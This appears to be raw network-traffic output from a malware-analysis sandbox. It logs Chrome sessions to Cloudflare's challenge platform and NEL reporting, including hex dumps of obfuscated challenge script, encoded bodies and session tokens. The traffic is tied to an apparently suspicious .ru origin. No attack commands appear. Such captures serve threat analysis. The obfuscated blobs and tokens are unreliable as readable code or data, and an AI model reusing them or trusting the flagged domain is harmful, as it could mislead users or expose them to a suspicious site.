                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 49 3c 3c 3d 31 2c 64 5b 67 5a 28 38 38 32 29 5d 28 4a 2c 64 5b 67 5a 28 31 32 31 38 29 5d 28 6a 2c 31 29 29 29 7b 48 5b 67 5a 28 39 38 31 29 5d 28 64 5b 67 5a 28 31 38 31 35 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 67 5a 28 31 32 37 38 29 5d 28 27 27 29 7d 65 6c 73 65 7b 66 6f 72 28 51 3d 27 27 2c 52 3d 30 3b 52 3c 73 5b 67 5a 28 31 35 38 32 29 5d 28 34 2c 48 5b 67 5a 28 31 33 31 30 29 5d 29 3b 51 2b 3d 67 5a 28 35 35 30 29 5b 67 5a 28 31 30 32 32 29 5d 28 6a 5b 52 3e 3e 32 2e 31 33 5d 3e 3e 73 5b 67 5a 28 38 32 37 29 5d 28 38 2a 28 33 2d 73 5b 67 5a 28 31 31 32 33 29 5d 28 52 2c 34 29 29 2c 34 29 26 31 35 29 2b 67 5a 28 35 35 30 29 5b
                                                                                                            Data Ascii: N>>=1,x++);for(;;)if(I<<=1,d[gZ(882)](J,d[gZ(1218)](j,1))){H[gZ(981)](d[gZ(1815)](o,I));break}else J++;return H[gZ(1278)]('')}else{for(Q='',R=0;R<s[gZ(1582)](4,H[gZ(1310)]);Q+=gZ(550)[gZ(1022)](j[R>>2.13]>>s[gZ(827)](8*(3-s[gZ(1123)](R,4)),4)&15)+gZ(550)[
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 3d 31 2c 64 5b 68 32 28 31 31 33 33 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 28 30 3c 4f 3f 31 3a 30 29 2a 49 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 64 5b 68 32 28 31 30 39 34 29 5d 28 65 2c 4d 29 2c 50 3d 45 2d 31 2c 44 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 32 28 39 36 34 29 5d 28 32 2c 31 36 29 2c 49 3d 31 3b 4e 21 3d 49 3b 4f 3d 4a 26 4b 2c 4b 3e 3e 3d 31 2c 30 3d 3d 4b 26 26 28 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 68 32 28 31 37 38 32 29 5d 28 30 3c 4f 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 65 28 4d 29 2c 50 3d 45 2d 31 2c 44 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 47 5b 68
                                                                                                            Data Ascii: =1,d[h2(1133)](0,K)&&(K=o,J=s(L++)),M|=(0<O?1:0)*I,I<<=1);C[E++]=d[h2(1094)](e,M),P=E-1,D--;break;case 1:for(M=0,N=Math[h2(964)](2,16),I=1;N!=I;O=J&K,K>>=1,0==K&&(K=o,J=s(L++)),M|=d[h2(1782)](0<O?1:0,I),I<<=1);C[E++]=e(M),P=E-1,D--;break;case 2:return G[h
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 41 28 38 32 39 29 5d 5b 68 41 28 37 33 38 29 5d 28 29 2c 65 4d 5b 68 41 28 38 32 39 29 5d 5b 68 41 28 31 30 31 36 29 5d 28 29 2c 65 4d 5b 68 41 28 31 34 36 37 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 41 28 33 35 32 29 5d 5b 68 41 28 31 30 39 36 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 41 28 31 32 39 36 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 41 28 31 32 30 31 29 5d 5b 68 41 28 31 34 31 37 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 68 41 28 38 34 39 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 41 28 31 32 30 31 29 5d 5b 68 41 28 31 30 36 38 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 41 28 31 32 30 31 29 5d 5b 68 41 28 31 37 34 34 29 5d 2c 27 63 6f 64 65 27 3a 68 41 28 33 36 30 29 2c 27 72 63 56 27 3a 65 4d 5b 68 41 28 31 32 30 31
                                                                                                            Data Ascii: A(829)][hA(738)](),eM[hA(829)][hA(1016)](),eM[hA(1467)]=!![],eM[hA(352)][hA(1096)]({'source':hA(1296),'widgetId':eM[hA(1201)][hA(1417)],'event':e[hA(849)],'cfChlOut':eM[hA(1201)][hA(1068)],'cfChlOutS':eM[hA(1201)][hA(1744)],'code':hA(360),'rcV':eM[hA(1201


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.449765104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:49 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            Content-Length: 3279
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            CF-Challenge: aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:49 UTC3279OUTData Raw: 76 5f 38 66 35 62 63 30 64 39 36 61 38 62 30 63 61 61 3d 36 45 2d 62 46 62 65 62 59 62 4a 62 4b 62 6b 56 52 70 56 52 31 42 38 31 38 53 6d 30 38 6d 52 38 42 43 53 69 38 59 43 52 76 56 52 43 69 35 52 24 57 62 69 63 54 31 57 63 46 73 45 38 79 52 7a 42 65 69 52 37 65 62 52 25 32 62 64 52 6d 6a 4e 52 30 33 42 52 53 2d 73 62 76 57 52 4e 62 65 46 33 52 4b 56 63 65 52 24 52 6d 55 68 52 24 4e 41 47 37 52 6d 33 2b 6a 4c 55 73 62 47 69 33 43 41 36 64 59 6a 24 66 45 4a 31 4f 73 52 59 39 35 47 73 73 52 76 2d 52 6f 62 52 4a 38 54 49 5a 64 7a 63 73 52 76 31 71 55 4c 71 51 65 6d 7a 4c 74 4e 50 65 6f 54 6e 63 68 52 38 76 38 6a 73 35 52 54 35 38 31 62 65 4e 31 52 38 65 52 63 65 73 52 36 2d 48 68 52 65 48 68 64 45 52 2d 50 24 65 4b 2d 44 68 4a 6f 35 73 41 65 48 33 52 2b 70
                                                                                                            Data Ascii: v_8f5bc0d96a8b0caa=6E-bFbebYbJbKbkVRpVR1B818Sm08mR8BCSi8YCRvVRCi5R$WbicT1WcFsE8yRzBeiR7ebR%2bdRmjNR03BRS-sbvWRNbeF3RKVceR$RmUhR$NAG7Rm3+jLUsbGi3CA6dYj$fEJ1OsRY95GssRv-RobRJ8TIZdzcsRv1qULqQemzLtNPeoTnchR8v8js5RT581beN1R8eRcesR6-HhReHhdER-P$eK-DhJo5sAeH3R+p
                                                                                                            2024-12-21 23:46:49 UTC747INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:49 GMT
                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                            Content-Length: 149736
                                                                                                            Connection: close
                                                                                                            cf-chl-gen: HwqY6jMQ20YBSoPGjsHGq/dh9ECS3scH7+BnwHoUadbe3z0cv7I/nMQfH0T8Zekk8T3ToyVXf4fNue5R7hZtxmPTHQJl+ASZQgXGixSnJc/DQ0la8h2Ttwc3EOVBn75z7eHjXcf1VHPvIeqwdB8K31mYk3oW1eO+SSH5WLvy/9dYXakYgcmH+QFd0gmNxf6zHyaR4VDXGbuwRaHZWJHfwscILYgLLVQvdKzSbQXH+9AvJIUzWKLYvnsQYhwbIdxEhTWFR28WMOmiq4fJb+qml+cUPebjPcALm4ht22A5wR8loJzu8qteP5khH+U8nI0WGMpyDfEPYdqbubeRlIGh6aTRP2IYwSjcX9HoMg3u5uv1Jl9bYHr/BIcJbA7ly+NddJ16yORKRTv5P5DIAt/0T9oL1nn0Co2Clj4AVSL5EkAWd/T2D3gaVOOqXiE3fYK8T2LBB1OGL5G2vR+ae7jElGGEqTh766g8YcMNHFg+Okd3ICA=$8tH6/3e0+FNrrMZx
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0f268480f64-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:49 UTC622INData Raw: 68 48 31 6f 58 45 70 69 54 59 36 41 61 48 64 77 6a 6e 4a 76 6e 6d 6c 71 67 59 39 78 66 6d 31 32 5a 5a 6d 48 64 48 65 6a 61 6d 69 66 70 71 6d 75 6e 4b 5a 7a 6c 4b 32 30 65 58 57 6f 69 6e 57 63 72 6e 31 39 76 35 75 33 6b 4c 5a 39 78 4c 75 58 6c 72 75 57 76 71 4b 4d 67 38 44 4a 6a 39 43 73 77 4e 47 6c 70 4d 76 63 6c 4e 65 33 71 74 53 71 74 62 2f 46 34 62 33 69 70 63 53 37 34 4b 66 73 71 63 58 65 38 4b 33 4b 31 4f 57 32 7a 73 54 50 2b 39 61 37 39 2f 33 36 77 64 58 6a 30 2b 4c 61 41 4f 6a 47 33 38 59 47 32 66 6a 66 32 64 44 6d 34 39 37 68 2f 76 51 56 38 2b 30 4e 36 42 45 63 32 76 41 58 46 4f 41 46 48 51 54 33 34 68 6a 30 39 42 58 72 48 78 76 2b 36 53 30 64 37 67 63 79 47 52 63 74 4d 79 6f 50 44 7a 41 4b 48 52 73 31 45 66 73 34 50 43 51 35 53 55 51 32 51 54 77
                                                                                                            Data Ascii: hH1oXEpiTY6AaHdwjnJvnmlqgY9xfm12ZZmHdHejamifpqmunKZzlK20eXWoinWcrn19v5u3kLZ9xLuXlruWvqKMg8DJj9CswNGlpMvclNe3qtSqtb/F4b3ipcS74KfsqcXe8K3K1OW2zsTP+9a79/36wdXj0+LaAOjG38YG2fjf2dDm497h/vQV8+0N6BEc2vAXFOAFHQT34hj09BXrHxv+6S0d7gcyGRctMyoPDzAKHRs1Efs4PCQ5SUQ2QTw
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 6c 66 49 6a 59 37 4a 6a 56 5a 52 57 67 72 51 44 64 77 51 6e 4d 38 50 55 46 6d 4d 6e 6c 4f 51 30 52 48 4f 46 42 6e 58 31 5a 37 58 48 4a 79 65 30 46 48 53 58 57 43 66 6c 69 42 52 32 69 4c 66 47 47 55 63 6e 53 56 5a 59 4a 76 56 6f 52 63 6a 48 42 73 6b 48 42 32 67 6c 32 46 59 4a 6c 2b 64 33 6c 6d 71 35 71 65 6e 36 57 69 6e 4b 32 55 73 62 61 6d 69 34 2b 52 74 6f 36 57 69 61 6d 75 66 35 78 37 6c 61 43 42 66 72 48 48 75 59 75 36 78 35 2f 50 73 59 72 50 68 73 36 50 6b 38 71 35 6c 35 4c 56 72 4e 6e 54 75 71 6d 75 33 73 58 42 73 71 4c 53 6f 39 53 37 76 4c 61 2f 35 74 2f 4b 77 4b 58 66 35 63 75 79 39 38 37 4b 79 64 48 4c 79 38 72 4a 2b 4e 62 39 78 4e 66 57 32 65 48 38 33 2f 6b 49 43 75 58 6a 41 41 48 63 44 51 44 76 33 67 6b 59 42 65 58 79 38 64 62 76 46 74 33 64 47
                                                                                                            Data Ascii: lfIjY7JjVZRWgrQDdwQnM8PUFmMnlOQ0RHOFBnX1Z7XHJye0FHSXWCfliBR2iLfGGUcnSVZYJvVoRcjHBskHB2gl2FYJl+d3lmq5qen6WinK2Usbami4+Rto6Wiamuf5x7laCBfrHHuYu6x5/PsYrPhs6Pk8q5l5LVrNnTuqmu3sXBsqLSo9S7vLa/5t/KwKXf5cuy987KydHLy8rJ+Nb9xNfW2eH83/kICuXjAAHcDQDv3gkYBeXy8dbvFt3dG
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 2b 56 32 73 38 57 69 56 75 50 31 74 6b 56 53 74 4a 51 47 74 56 51 33 68 7a 64 6b 5a 50 58 56 46 51 54 55 41 2f 56 34 4e 56 63 31 56 64 5a 6e 35 2b 6a 59 6c 70 68 30 6d 4e 6a 6f 4f 42 64 6f 6d 55 5a 6e 75 57 6c 6d 2b 50 69 31 71 52 57 6f 4a 31 6f 48 6d 6d 69 33 4f 68 69 59 32 42 72 37 47 75 6f 6f 75 47 74 4b 36 5a 6b 62 71 46 64 6e 6d 47 6b 59 6d 51 6f 63 54 43 6f 5a 79 2f 68 49 50 43 79 71 43 75 77 63 69 66 69 71 66 53 71 36 2b 65 31 73 43 6c 6f 74 6d 76 6e 4c 4b 58 72 62 6a 42 35 4f 44 6b 75 38 53 65 77 39 37 49 77 65 53 72 75 4b 62 77 35 4d 6a 47 73 74 4c 55 38 74 50 6c 75 64 32 33 36 62 48 79 7a 76 55 43 2b 51 48 5a 31 63 62 31 31 2f 66 74 32 38 72 6e 43 76 72 63 36 74 30 52 36 76 55 56 45 68 54 31 38 68 67 48 46 4e 63 63 48 66 6b 58 48 41 63 6a 46 2f
                                                                                                            Data Ascii: +V2s8WiVuP1tkVStJQGtVQ3hzdkZPXVFQTUA/V4NVc1VdZn5+jYlph0mNjoOBdomUZnuWlm+Pi1qRWoJ1oHmmi3OhiY2Br7GuoouGtK6ZkbqFdnmGkYmQocTCoZy/hIPCyqCuwcifiqfSq6+e1sClotmvnLKXrbjB5ODku8Sew97IweSruKbw5MjGstLU8tPlud236bHyzvUC+QHZ1cb11/ft28rnCvrc6t0R6vUVEhT18hgHFNccHfkXHAcjF/
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 58 45 64 4e 56 45 74 6e 61 6d 4a 49 57 30 64 54 58 6c 74 4b 56 47 4a 77 59 56 79 43 55 56 78 33 63 6e 6c 44 68 47 35 69 69 30 71 45 6a 33 46 6e 6a 6d 52 72 56 32 68 77 6a 59 78 72 65 34 32 4e 65 31 31 30 6e 6f 43 4f 64 35 69 66 65 4b 52 36 68 70 61 75 6d 6e 36 43 69 71 74 73 69 6e 46 30 65 61 57 48 70 6d 2b 79 75 6e 39 39 6d 38 47 39 67 59 50 41 68 72 47 59 68 61 79 4e 6a 63 32 59 7a 37 72 44 79 4d 71 57 77 35 61 54 6f 74 72 4a 78 74 53 71 72 37 4c 61 76 39 61 36 30 39 36 69 71 4c 50 4d 78 4d 58 4f 72 4d 2f 69 77 74 37 6c 38 76 44 6b 31 2b 47 34 36 65 6d 34 41 4f 66 61 41 37 37 4f 30 39 44 34 78 41 62 69 31 74 6a 6a 79 4d 6a 4c 79 38 6f 4d 2f 76 4c 6a 41 78 54 69 37 4f 38 4a 31 52 6b 52 47 78 48 78 44 65 73 42 49 52 41 48 38 50 45 61 49 4f 76 6a 44 76 77
                                                                                                            Data Ascii: XEdNVEtnamJIW0dTXltKVGJwYVyCUVx3cnlDhG5ii0qEj3FnjmRrV2hwjYxre42Ne110noCOd5ifeKR6hpaumn6CiqtsinF0eaWHpm+yun99m8G9gYPAhrGYhayNjc2Yz7rDyMqWw5aTotrJxtSqr7Lav9a6096iqLPMxMXOrM/iwt7l8vDk1+G46em4AOfaA77O09D4xAbi1tjjyMjLy8oM/vLjAxTi7O8J1RkRGxHxDesBIRAH8PEaIOvjDvw
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 32 42 4b 62 6c 42 53 52 6c 55 37 4f 30 42 41 50 6b 46 77 59 33 5a 6d 63 33 4f 4a 53 6f 71 49 65 59 4b 49 61 6b 36 47 64 59 64 71 59 70 56 59 54 59 69 54 65 70 2b 61 67 58 39 76 63 58 6d 59 63 33 56 32 66 5a 78 6f 71 61 75 68 62 35 36 48 70 6f 71 53 6a 62 65 58 68 6f 36 62 72 71 79 64 68 33 37 42 6f 73 53 30 6d 71 4b 52 6b 4c 32 6c 79 6f 71 48 77 73 69 66 30 4a 47 7a 6f 4b 4f 4f 70 36 2f 4e 6c 4a 4c 52 31 4d 33 57 71 73 71 65 6c 64 4f 67 31 73 69 2b 76 36 61 39 36 75 44 59 76 4f 50 66 35 75 54 6f 35 4d 48 75 37 73 72 79 31 62 54 70 78 74 7a 2b 39 50 33 61 77 64 7a 34 38 75 66 47 44 50 76 35 37 51 2f 34 33 2f 44 67 38 39 54 54 7a 41 59 43 2b 50 66 31 32 52 7a 79 32 42 72 65 37 69 44 34 38 51 38 41 43 41 66 6b 2b 53 33 39 4c 69 58 36 48 51 59 4a 4d 69 77 77
                                                                                                            Data Ascii: 2BKblBSRlU7O0BAPkFwY3Zmc3OJSoqIeYKIak6GdYdqYpVYTYiTep+agX9vcXmYc3V2fZxoqauhb56HpoqSjbeXho6brqydh37BosS0mqKRkL2lyoqHwsif0JGzoKOOp6/NlJLR1M3WqsqeldOg1si+v6a96uDYvOPf5uTo5MHu7sry1bTpxtz+9P3awdz48ufGDPv57Q/43/Dg89TTzAYC+Pf12Rzy2Bre7iD48Q8ACAfk+S39LiX6HQYJMiww
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 70 52 56 32 38 39 55 45 36 44 4f 45 52 78 56 6d 4a 39 69 6c 70 45 68 46 78 44 69 6f 68 6d 56 56 39 6d 6a 32 47 55 59 35 47 4e 61 70 39 67 59 49 47 63 6c 4b 46 2f 66 6d 57 66 59 4b 47 56 71 71 6d 72 69 6d 69 69 6e 36 68 78 6b 62 53 34 73 34 4f 46 72 70 61 77 6e 62 36 41 6f 58 79 31 66 4b 4f 69 6d 4b 69 7a 68 5a 79 57 6e 4d 6d 78 70 73 6d 76 6e 74 61 6d 71 36 2b 77 7a 70 4b 33 73 71 76 61 72 4c 4b 32 74 75 43 6c 30 37 36 6c 6d 38 71 6c 77 36 76 72 77 38 79 2b 75 76 4c 30 78 63 37 77 39 76 72 57 31 37 7a 6f 79 4e 62 53 33 4d 48 79 7a 73 50 36 41 2f 49 49 42 73 58 72 41 4f 58 39 45 41 6b 55 45 68 45 46 33 67 6e 6b 46 75 77 59 32 52 76 62 2b 64 38 65 34 65 33 66 42 76 67 63 39 76 48 68 2f 4f 54 31 42 69 77 4d 43 2b 73 4e 42 76 34 33 41 75 6f 33 39 41 6b 4b 42
                                                                                                            Data Ascii: pRV289UE6DOERxVmJ9ilpEhFxDiohmVV9mj2GUY5GNap9gYIGclKF/fmWfYKGVqqmrimiin6hxkbS4s4OFrpawnb6AoXy1fKOimKizhZyWnMmxpsmvntamq6+wzpK3sqvarLK2tuCl076lm8qlw6vrw8y+uvL0xc7w9vrW17zoyNbS3MHyzsP6A/IIBsXrAOX9EAkUEhEF3gnkFuwY2Rvb+d8e4e3fBvgc9vHh/OT1BiwMC+sNBv43Auo39AkKB
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 54 55 33 68 52 67 47 42 66 54 46 39 63 69 47 4a 52 68 57 78 76 58 34 69 45 69 57 5a 33 57 34 68 59 6c 31 32 62 6c 58 56 2b 6a 5a 32 4f 6b 48 56 67 70 36 79 74 6f 6d 74 74 6d 36 39 76 6a 59 64 31 69 35 43 53 68 34 53 48 71 70 32 47 73 72 47 70 6f 4d 4f 65 66 5a 71 6e 6e 4a 69 69 75 61 64 2f 6c 70 69 2b 79 4a 75 6f 76 71 6a 4e 72 62 66 4e 71 36 79 58 75 61 2f 52 74 37 62 55 34 5a 33 5a 74 63 65 35 35 4c 7a 6a 71 72 33 5a 36 4e 6a 41 37 38 75 72 74 4d 6e 49 36 72 44 51 78 63 7a 54 32 75 69 2f 76 39 44 61 38 64 54 39 41 77 72 78 77 66 50 56 42 39 6e 74 44 51 62 66 37 76 48 65 43 68 66 6a 38 76 63 48 43 51 7a 74 46 77 44 36 48 2f 37 31 46 68 34 41 35 51 72 34 2b 78 73 49 43 66 67 77 36 77 72 78 46 50 49 31 49 77 73 74 45 52 4d 4a 46 6a 6b 58 4d 6a 59 54 4c 78
                                                                                                            Data Ascii: TU3hRgGBfTF9ciGJRhWxvX4iEiWZ3W4hYl12blXV+jZ2OkHVgp6ytomttm69vjYd1i5CSh4SHqp2GsrGpoMOefZqnnJiiuad/lpi+yJuovqjNrbfNq6yXua/Rt7bU4Z3Ztce55Lzjqr3Z6NjA78urtMnI6rDQxczT2ui/v9Da8dT9AwrxwfPVB9ntDQbf7vHeChfj8vcHCQztFwD6H/71Fh4A5Qr4+xsICfgw6wrxFPI1IwstERMJFjkXMjYTLx
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 64 45 56 35 62 31 78 75 57 34 74 6f 67 6d 46 77 69 6c 47 57 6b 4a 74 62 64 4a 68 65 62 58 47 54 6f 33 71 50 70 36 4a 79 65 71 6c 65 68 48 69 70 66 34 4f 4f 6b 36 32 4f 70 72 47 32 69 72 75 35 73 4a 53 63 74 5a 6d 69 64 4a 2b 38 6f 70 43 2f 6d 34 61 49 6c 70 57 4a 6f 36 79 6f 72 5a 75 51 70 4c 47 76 78 73 36 52 6a 4b 61 39 6d 4e 69 56 79 62 69 78 34 65 47 35 73 4c 6d 6c 71 62 71 39 74 38 44 68 72 63 53 76 70 4f 43 74 74 4c 37 54 79 72 4c 35 30 64 62 4c 38 38 65 35 34 41 44 30 41 62 76 78 2f 4d 4c 4a 34 63 58 44 77 2b 62 69 7a 4d 38 4f 37 67 34 53 34 41 76 77 32 50 50 6f 47 51 63 4f 36 74 73 63 39 39 2f 65 45 42 72 6a 34 68 63 4b 42 53 77 57 49 4f 30 6e 4a 6a 51 44 49 43 48 7a 38 52 51 4d 4f 69 2f 79 4d 44 51 4b 44 53 41 51 47 79 45 79 50 53 59 7a 4b 6a 73
                                                                                                            Data Ascii: dEV5b1xuW4togmFwilGWkJtbdJhebXGTo3qPp6JyeqlehHipf4OOk62OprG2iru5sJSctZmidJ+8opC/m4aIlpWJo6yorZuQpLGvxs6RjKa9mNiVybix4eG5sLmlqbq9t8DhrcSvpOCttL7TyrL50dbL88e54AD0Abvx/MLJ4cXDw+bizM8O7g4S4Avw2PPoGQcO6tsc99/eEBrj4hcKBSwWIO0nJjQDICHz8RQMOi/yMDQKDSAQGyEyPSYzKjs
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 6c 2b 4b 5a 6d 4a 6b 59 32 79 4b 68 5a 71 4d 61 59 42 31 58 71 43 66 6f 48 6c 66 63 71 52 30 6e 33 57 6d 61 36 57 45 66 6d 6d 45 70 72 4f 31 64 4a 53 4e 70 72 6d 77 73 70 36 78 68 34 69 72 6d 70 4f 75 6c 48 2b 58 6e 35 4b 53 6d 70 61 6c 68 34 71 35 78 4d 72 44 78 4e 4b 52 73 36 43 35 79 38 65 75 79 61 69 38 6d 38 2b 38 73 4e 43 2b 70 4c 76 44 35 75 58 54 7a 4c 6a 63 32 75 44 46 36 73 48 63 36 72 4c 6e 79 66 44 61 33 4d 62 6d 33 4c 76 71 36 73 37 54 32 4c 66 65 77 74 66 49 33 73 4c 73 34 4d 67 4f 32 75 7a 69 41 2b 33 6a 35 41 6e 52 47 39 72 36 42 39 59 4c 37 39 38 4f 34 41 41 6a 49 4f 38 5a 42 67 55 6d 4b 67 4d 50 2b 43 67 45 4b 53 73 73 43 43 59 66 41 69 77 76 4d 51 63 77 44 7a 63 55 46 51 49 38 48 7a 6b 75 4f 7a 64 4b 4e 41 63 39 50 44 34 6d 51 42 38 78
                                                                                                            Data Ascii: l+KZmJkY2yKhZqMaYB1XqCfoHlfcqR0n3Wma6WEfmmEprO1dJSNprmwsp6xh4irmpOulH+Xn5KSmpalh4q5xMrDxNKRs6C5y8euyai8m8+8sNC+pLvD5uXTzLjc2uDF6sHc6rLnyfDa3Mbm3Lvq6s7T2LfewtfI3sLs4MgO2uziA+3j5AnRG9r6B9YL798O4AAjIO8ZBgUmKgMP+CgEKSssCCYfAiwvMQcwDzcUFQI8HzkuOzdKNAc9PD4mQB8x


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.44976735.190.80.14435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:49 UTC534OUTOPTIONS /report/v4?s=zf2cyPTcb770mHpOo8Ao4kqOpBNflpSWY8j173SOCajOnQ9psL5bIVwcPbiTPo45iui7FJV4U7KQZmJTV%2BSJzfoOMNAg%2ButsQmGrdz26ZLBUppNFse7gc3O68SlnyA%3D%3D HTTP/1.1
                                                                                                            Host: a.nel.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            Origin: https://tf6.jqugbctcds.ru
                                                                                                            Access-Control-Request-Method: POST
                                                                                                            Access-Control-Request-Headers: content-type
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:50 UTC336INHTTP/1.1 200 OK
                                                                                                            Content-Length: 0
                                                                                                            access-control-max-age: 86400
                                                                                                            access-control-allow-methods: OPTIONS, POST
                                                                                                            access-control-allow-origin: *
                                                                                                            access-control-allow-headers: content-type, content-length
                                                                                                            date: Sat, 21 Dec 2024 23:46:50 GMT
                                                                                                            Via: 1.1 google
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.449771104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:51 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:51 UTC379INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 21 Dec 2024 23:46:51 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 7
                                                                                                            Connection: close
                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            cf-chl-out: SHh0a4KtzHl2gDw0LcsakF7jyLQZmEZDTJA=$Z7koWv5M1ZZOF2Oe
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc101c8018c5f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:51 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                            Data Ascii: invalid


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.44977335.190.80.14435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:51 UTC474OUTPOST /report/v4?s=zf2cyPTcb770mHpOo8Ao4kqOpBNflpSWY8j173SOCajOnQ9psL5bIVwcPbiTPo45iui7FJV4U7KQZmJTV%2BSJzfoOMNAg%2ButsQmGrdz26ZLBUppNFse7gc3O68SlnyA%3D%3D HTTP/1.1
                                                                                                            Host: a.nel.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            Content-Length: 429
